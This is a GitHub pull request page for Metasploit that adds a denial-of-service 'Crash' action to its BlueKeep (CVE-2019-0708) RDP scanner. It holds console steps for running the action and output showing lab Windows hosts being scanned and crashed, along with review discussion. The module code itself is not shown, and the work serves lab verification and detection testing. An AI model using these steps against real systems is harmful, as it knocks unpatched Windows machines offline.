Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add DoS action to BlueKeep (CVE-2019-0708) scanner #12170

Merged
merged 6 commits into from Aug 8, 2019

Conversation

@TomSellers
Copy link
Contributor

commented Aug 7, 2019

This PR adds a denial of service action to the existing BlueKeep (CVE-2019-0708) module auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb.

The goal of providing this capability is to enable verification of impact as well as testing of detection and mitigating controls.

The DoS trigger has been tested against

  • Windows XP Pro, Service Pack 3
  • Windows 2003 Server, Service Pack 1
  • Windows 7 Pro,
  • Windows Server 2008 R2, Service Pack 1

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  • Verify that it still successfully identifies vulnerable hosts
  • Verify that it still successfully identifies host that are not vulnerable
  • set action Crash
  • Verify that it causes a BsoD on vulnerable hosts
  • Verify that it does not cause BSoD on hosts that are not vulnerable

Example output

Windows XP Pro

Check vulnerability - normal output

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set action Scan 
action => Scan
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[+] 192.168.50.121:3389   - The target is vulnerable.
[*] 192.168.50.121:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Check vulnerability - verbose output

Expand for output
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > options

Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS           192.168.50.121   yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)
   THREADS          4                yes       The number of concurrent threads

Auxiliary action:

   Name  Description
   ----  -----------
   Scan  Scan for exploitable targets

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[*] 192.168.50.121:3389   - Verifying RDP protocol...
[*] 192.168.50.121:3389   - Attempting to connect using TLS security
[*] 192.168.50.121:3389   - Attempt to connect with TLS failed but looks like the target is Windows XP
[*] 192.168.50.121:3389   - Attempting to connect using Standard RDP security
[*] 192.168.50.121:3389   - Server requests RDP Security
[*] 192.168.50.121:3389   - Sending erect domain request
[*] 192.168.50.121:3389   - Sending security exchange PDU
[*] 192.168.50.121:3389   - Sending client info PDU
[*] 192.168.50.121:3389   - Received License packet
[*] 192.168.50.121:3389   - Waiting for Server Demand packet
[*] 192.168.50.121:3389   - Received Server Demand packet
[*] 192.168.50.121:3389   - Sending client confirm active PDU
[*] 192.168.50.121:3389   - Sending client synchronize PDU
[*] 192.168.50.121:3389   - Sending client control cooperate PDU
[*] 192.168.50.121:3389   - Sending client control request control PDU
[*] 192.168.50.121:3389   - Sending client input sychronize PDU
[*] 192.168.50.121:3389   - Sending client font list PDU
[*] 192.168.50.121:3389   - Sending patch check payloads
[+] 192.168.50.121:3389   - The target is vulnerable.
[*] 192.168.50.121:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Causing a crash - normal output

[+] 192.168.50.121:3389   - Target service appears to have been successfully crashed.
[+] 192.168.50.121:3389   - The target is vulnerable.
[*] 192.168.50.121:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Causing a crash - verbose

Expand for output
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set action Crash
Action => Crash
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[*] 192.168.50.121:3389   - Verifying RDP protocol...
[*] 192.168.50.121:3389   - Attempting to connect using TLS security
[*] 192.168.50.121:3389   - Attempt to connect with TLS failed but looks like the target is Windows XP
[*] 192.168.50.121:3389   - Attempting to connect using Standard RDP security
[*] 192.168.50.121:3389   - Server requests RDP Security
[*] 192.168.50.121:3389   - Sending erect domain request
[*] 192.168.50.121:3389   - Sending security exchange PDU
[*] 192.168.50.121:3389   - Sending client info PDU
[*] 192.168.50.121:3389   - Received License packet
[*] 192.168.50.121:3389   - Waiting for Server Demand packet
[*] 192.168.50.121:3389   - Received Server Demand packet
[*] 192.168.50.121:3389   - Sending client confirm active PDU
[*] 192.168.50.121:3389   - Sending client synchronize PDU
[*] 192.168.50.121:3389   - Sending client control cooperate PDU
[*] 192.168.50.121:3389   - Sending client control request control PDU
[*] 192.168.50.121:3389   - Sending client input sychronize PDU
[*] 192.168.50.121:3389   - Sending client font list PDU
[*] 192.168.50.121:3389   - Sending denial of service payloads
[+] 192.168.50.121:3389   - Target service appears to have been successfully crashed.
[+] 192.168.50.121:3389   - The target is vulnerable.
[*] 192.168.50.121:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Windows Server 2008 R2

Check vulnerability - NLA enabled - normal output

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[*] 192.168.50.146:3389   - The target is not exploitable.
[*] 192.168.50.146:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Check vulnerability - NLA enabled - verbose output

Expand for output
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set verbose true
verbose => true
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[*] 192.168.50.146:3389   - Verifying RDP protocol...
[*] 192.168.50.146:3389   - Attempting to connect using TLS security
[*] 192.168.50.146:3389   - Server requires NLA (CredSSP) security which mitigates this vulnerability.
[*] 192.168.50.146:3389   - The target is not exploitable.
[*] 192.168.50.146:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Check vulnerability - normal output

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set action Crash
Action => Crash
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit 

[+] 192.168.50.146:3389   - The target is vulnerable.
[*] 192.168.50.146:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Check vulnerability - verbose output

Expand for output
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit 

[*] 192.168.50.146:3389   - Verifying RDP protocol...
[*] 192.168.50.146:3389   - Attempting to connect using TLS security
[*] 192.168.50.146:3389   - Server requests TLS
[*] 192.168.50.146:3389   - Sending erect domain request
[*] 192.168.50.146:3389   - Sending client info PDU
[*] 192.168.50.146:3389   - Received License packet
[*] 192.168.50.146:3389   - Waiting for Server Demand packet
[*] 192.168.50.146:3389   - Received Server Demand packet
[*] 192.168.50.146:3389   - Sending client confirm active PDU
[*] 192.168.50.146:3389   - Sending client synchronize PDU
[*] 192.168.50.146:3389   - Sending client control cooperate PDU
[*] 192.168.50.146:3389   - Sending client control request control PDU
[*] 192.168.50.146:3389   - Sending client input sychronize PDU
[*] 192.168.50.146:3389   - Sending client font list PDU
[*] 192.168.50.146:3389   - Sending patch check payloads
[+] 192.168.50.146:3389   - The target is vulnerable.
[*] 192.168.50.146:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Causing a crash - normal output

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set action Crash
Action => Crash
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[+] 192.168.50.146:3389   - Target service appears to have been successfully crashed.
[+] 192.168.50.146:3389   - The target is vulnerable.
[*] 192.168.50.146:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Causing a crash - verbose

Expand for output
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set action Crash
Action => Crash
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[*] 192.168.50.146:3389   - Verifying RDP protocol...
[*] 192.168.50.146:3389   - Attempting to connect using TLS security
[*] 192.168.50.146:3389   - Server requests TLS
[*] 192.168.50.146:3389   - Sending erect domain request
[*] 192.168.50.146:3389   - Sending client info PDU
[*] 192.168.50.146:3389   - Received License packet
[*] 192.168.50.146:3389   - Waiting for Server Demand packet
[*] 192.168.50.146:3389   - Received Server Demand packet
[*] 192.168.50.146:3389   - Sending client confirm active PDU
[*] 192.168.50.146:3389   - Sending client synchronize PDU
[*] 192.168.50.146:3389   - Sending client control cooperate PDU
[*] 192.168.50.146:3389   - Sending client control request control PDU
[*] 192.168.50.146:3389   - Sending client input sychronize PDU
[*] 192.168.50.146:3389   - Sending client font list PDU
[*] 192.168.50.146:3389   - Sending denial of service payloads
[+] 192.168.50.146:3389   - Target service appears to have been successfully crashed.
[+] 192.168.50.146:3389   - The target is vulnerable.
[*] 192.168.50.146:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/rdp/cve_2019_0708_b

Desired by #12171.

@tsellers-r7

This comment has been minimized.

Copy link

commented Aug 7, 2019

Any comments on 'Stability' => [ CRASH_SAFE ],?

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 7, 2019

I ran this against the WIndows Range.
34 Windows VMs, all with firewalls disabled and RDP enabled.
6 VMs vulnerable, 28 not.

Scanner Options:

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options

Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):

   Name             Current Setting   Required  Description
   ----             ---------------   --------  -----------
   EXPLOIT_DOS      false              no        Trigger denial of service vulnerability.
   RDP_CLIENT_IP    192.168.0.100     yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  rdesktop          no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                         no        The client domain name to report during connect
   RDP_USER                           no        The username to report during connect, UNSET = random
   RHOSTS           192.168.134.0/24  yes       The target address range or CIDR identifier
   RPORT            3389              yes       The target port (TCP)
   THREADS          25                yes       The number of concurrent threads
  1. Scanner reports that the six expected vulnerable VMs are vulnerable:
tmoose@ubuntu:~/rapid7/metasploit-framework$ cat output.txt | grep vulnerable
[+] 192.168.134.113:3389  - The target is vulnerable.
[+] 192.168.134.120:3389  - The target is vulnerable.
[+] 192.168.134.133:3389  - The target is vulnerable.
[+] 192.168.134.130:3389  - The target is vulnerable.
[+] 192.168.134.142:3389  - The target is vulnerable.
[+] 192.168.134.199:3389  - The target is vulnerable.
  1. Scanner reports that the twenty-six expected non-vulnerable VMs are not vulnerable:
[*] 192.168.134.104:3389  - The target is not exploitable.
[*] 192.168.134.109:3389  - The target is not exploitable.
[*] 192.168.134.106:3389  - The target is not exploitable.
[*] 192.168.134.114:3389  - The target is not exploitable.
[*] 192.168.134.123:3389  - The target is not exploitable.
[*] 192.168.134.115:3389  - The target is not exploitable.
[*] 192.168.134.119:3389  - The target is not exploitable.
[*] 192.168.134.121:3389  - The target is not exploitable.
[*] 192.168.134.118:3389  - The target is not exploitable.
[*] 192.168.134.117:3389  - The target is not exploitable.
[*] 192.168.134.132:3389  - The target is not exploitable.
[*] 192.168.134.129:3389  - The target is not exploitable.
[*] 192.168.134.146:3389  - The target is not exploitable.
[*] 192.168.134.151:3389  - The target is not exploitable.
[*] 192.168.134.149:3389  - The target is not exploitable.
[*] 192.168.134.161:3389  - The target is not exploitable.
[*] 192.168.134.164:3389  - The target is not exploitable.
[*] 192.168.134.165:3389  - The target is not exploitable.
[*] 192.168.134.162:3389  - The target is not exploitable.
[*] 192.168.134.169:3389  - The target is not exploitable.
[*] 192.168.134.171:3389  - The target is not exploitable.
[*] 192.168.134.172:3389  - The target is not exploitable.
[*] 192.168.134.177:3389  - The target is not exploitable.
[*] 192.168.134.185:3389  - The target is not exploitable.
[*] 192.168.134.187:3389  - The target is not exploitable.
[*] 192.168.134.193:3389  - The target is not exploitable.
[*] 192.168.134.192:3389  - The target is not exploitable.
[*] 192.168.134.191:3389  - The target is not exploitable.

DoS results were not entirely consistent, but effective:
First run: Several did not BSoD, then I started charting
Run 2:
Windows 7x86 SP0 failed to restart
Run 3:
Win7x64 SP1 and Win2008r2x64_SP1 failed to restart
Run 4:
All rebooted.

If you are interested in the technical stuff:

Range contents (via Nmap on 3389)

Starting Nmap 7.01 ( https://nmap.org ) at 2019-08-07 09:47 CDT
Nmap scan report for Win2019x64.moose (192.168.134.104)
Host is up (0.00044s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win1803x64.moose (192.168.134.106)
Host is up (0.0053s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win2016x64.moose (192.168.134.109)
Host is up (0.0050s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win7x86.moose (192.168.134.113)
Host is up (0.0046s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86_1703.moose (192.168.134.114)
Host is up (0.0044s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win1709x64.moose (192.168.134.115)
Host is up (0.0043s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64.moose (192.168.134.117)
Host is up (0.0041s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64_1703.moose (192.168.134.118)
Host is up (0.0041s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86_1803.moose (192.168.134.119)
Host is up (0.0040s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win7x64sp1.moose (192.168.134.120)
Host is up (0.0038s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64_1511.moose (192.168.134.121)
Host is up (0.0037s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win8x64.moose (192.168.134.123)
Host is up (0.0035s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86.moose (192.168.134.129)
Host is up (0.0034s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win7x86sp1.moose (192.168.134.130)
Host is up (0.0033s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64_1709.moose (192.168.134.132)
Host is up (0.0031s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win2008r2x64sp1.moose (192.168.134.133)
Host is up (0.0029s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win7x64.moose (192.168.134.142)
Host is up (0.0021s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win1809x64.moose (192.168.134.146)
Host is up (0.0016s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64_1607.moose (192.168.134.149)
Host is up (0.0013s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win2012x64.moose (192.168.134.151)
Host is up (0.0011s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win81x64sp1.moose (192.168.134.161)
Host is up (0.0040s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win81x64.moose (192.168.134.162)
Host is up (0.0039s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64_1809.moose (192.168.134.164)
Host is up (0.0037s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86_1709.moose (192.168.134.165)
Host is up (0.0036s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win81x86sp1.moose (192.168.134.169)
Host is up (0.0032s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win81x86.moose (192.168.134.171)
Host is up (0.0030s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win2012r2x64sp1.moose (192.168.134.172)
Host is up (0.0029s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64_1803.moose (192.168.134.177)
Host is up (0.0024s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win8x86.moose (192.168.134.185)
Host is up (0.0015s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win2012r2x64.moose (192.168.134.187)
Host is up (0.0016s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86_1809.moose (192.168.134.191)
Host is up (0.0012s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86_1607.moose (192.168.134.192)
Host is up (0.0010s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86_1511.moose (192.168.134.193)
Host is up (0.00077s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win2008r2x64.moose (192.168.134.199)
Host is up (0.0019s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 7, 2019

Ooops.... Forgot output from crashes:

[+] 192.168.134.120:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.130:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.113:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.133:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.142:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.199:3389  - Target service appears to have been successfully crashed.
@tsellers-r7

This comment has been minimized.

Copy link

commented Aug 7, 2019

Thanks @bwatters-r7 I'll dig in and see if I can reproduce the delayed crash.

@busterb

This comment has been minimized.

Copy link
Member

commented Aug 7, 2019

I switched this to have an explicit 'Crash' action instead of a separate datastore option and pushed to this PR. @bwatters would you mind verifying that it looks just the same as before? I also updated the PR testing notes to match.

@tsellers-r7

This comment has been minimized.

Copy link

commented Aug 7, 2019

Looks good to me. I can revisit the crash consistency after the library changes land.

@busterb

This comment has been minimized.

Copy link
Member

commented Aug 7, 2019

Sounds good to me.

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 7, 2019

Admittedly, I'm a little sad that when you hit show options it does not mention that there is a crash option, but I don't think that's a "this module" problem.....

Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):

   Name             Current Setting   Required  Description
   ----             ---------------   --------  -----------
   RDP_CLIENT_IP    192.168.0.100     yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  rdesktop          no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                         no        The client domain name to report during connect
   RDP_USER                           no        The username to report during connect, UNSET = random
   RHOSTS           192.168.134.0/24  yes       The target address range or CIDR identifier
   RPORT            3389              yes       The target port (TCP)
   THREADS          25                yes       The number of concurrent threads


Auxiliary action:

   Name  Description
   ----  -----------
   Scan  Scan for exploitable targets

Scan output on not exploitable:

[*] 192.168.134.104:3389  - The target is not exploitable.
[*] 192.168.134.109:3389  - The target is not exploitable.
[*] 192.168.134.117:3389  - The target is not exploitable.
[*] 192.168.134.121:3389  - The target is not exploitable.
[*] 192.168.134.115:3389  - The target is not exploitable.
[*] 192.168.134.106:3389  - The target is not exploitable.
[*] 192.168.134.118:3389  - The target is not exploitable.
[*] 192.168.134.123:3389  - The target is not exploitable.
[*] 192.168.134.114:3389  - The target is not exploitable.
[*] 192.168.134.119:3389  - The target is not exploitable.
[*] 192.168.134.129:3389  - The target is not exploitable.
[*] 192.168.134.132:3389  - The target is not exploitable.
[*] 192.168.134.149:3389  - The target is not exploitable.
[*] 192.168.134.146:3389  - The target is not exploitable.
[*] 192.168.134.151:3389  - The target is not exploitable.
[*] 192.168.134.162:3389  - The target is not exploitable.
[*] 192.168.134.164:3389  - The target is not exploitable.
[*] 192.168.134.161:3389  - The target is not exploitable.
[*] 192.168.134.172:3389  - The target is not exploitable.
[*] 192.168.134.169:3389  - The target is not exploitable.
[*] 192.168.134.177:3389  - The target is not exploitable.
[*] 192.168.134.165:3389  - The target is not exploitable.
[*] 192.168.134.171:3389  - The target is not exploitable.
[*] 192.168.134.187:3389  - The target is not exploitable.
[*] 192.168.134.192:3389  - The target is not exploitable.
[*] 192.168.134.193:3389  - The target is not exploitable.
[*] 192.168.134.191:3389  - The target is not exploitable.
[*] 192.168.134.185:3389  - The target is not exploitable.

Scan output on vulnerable:

[+] 192.168.134.120:3389  - The target is vulnerable.
[+] 192.168.134.113:3389  - The target is vulnerable.
[+] 192.168.134.133:3389  - The target is vulnerable.
[+] 192.168.134.130:3389  - The target is vulnerable.
[+] 192.168.134.142:3389  - The target is vulnerable.
[+] 192.168.134.199:3389  - The target is vulnerable.

Still a bit flakey on the actual BSoD:

[-] 192.168.134.130:3389  - Target doesn't appear to have been crashed.
[-] 192.168.134.113:3389  - Target doesn't appear to have been crashed.
[-] 192.168.134.142:3389  - Target doesn't appear to have been crashed.
[+] 192.168.134.120:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.133:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.199:3389  - Target service appears to have been successfully crashed.

Second Run:

[+] 192.168.134.113:3389  - Target service appears to have been successfully crashed.
[-] 192.168.134.130:3389  - Target doesn't appear to have been crashed.
[+] 192.168.134.120:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.142:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.133:3389  - Target service appears to have been successfully crashed.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 7, 2019

Admittedly, I'm a little sad that when you hit show options it does not mention that there is a crash option, but I don't think that's a "this module" problem.....

Correct, show options will show only the selected action, which is dumb. You need to run info or show actions to get the full list. I've got a refactor that addresses that, but it hasn't been added to #11785 yet.

@tsellers-r7

This comment has been minimized.

Copy link

commented Aug 7, 2019

FYI @bwatters-r7 I'm working on the reliability issue now

@tsellers-r7

This comment has been minimized.

Copy link

commented Aug 7, 2019

@bwatters-r7 - Can you test again. I still think it's gonna be flakey but its been a touch more robust with these minor tweaks.

@wvu-r7

wvu-r7 approved these changes Aug 7, 2019

Copy link
Contributor

left a comment

Happy enough with these changes. Feel free to update the PR (merge or rebase) when #12171 lands.

@wvu-r7 wvu-r7 self-assigned this Aug 7, 2019

@busterb

busterb approved these changes Aug 7, 2019

Copy link
Member

left a comment

Looks good to me too.

TomSellers added some commits Aug 8, 2019

@busterb busterb merged commit 46b6a59 into rapid7:master Aug 8, 2019

2 of 3 checks passed

continuous-integration/travis-ci/pr The Travis CI build is in progress
Details
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details

busterb added a commit that referenced this pull request Aug 8, 2019

msjenkins-r7 added a commit that referenced this pull request Aug 8, 2019

@busterb busterb self-assigned this Aug 8, 2019

@busterb

This comment has been minimized.

Copy link
Member

commented Aug 8, 2019

Release Notes

This adds a denial of service action to the existing BlueKeep (CVE-2019-0708) scanner module auxiliary/scanner/rdp/cve_2019_0708_bluekeep. The goal of providing this capability is to enable verification of impact as well as testing of detection and mitigating controls.

@TomSellers TomSellers deleted the TomSellers:bluekeep_dos branch Aug 8, 2019

@wvu-r7 wvu-r7 changed the title BlueKeep: Add DoS exploit Add DoS action to BlueKeep (CVE-2019-0708) scanner Aug 8, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
5 participants
You can’t perform that action at this time.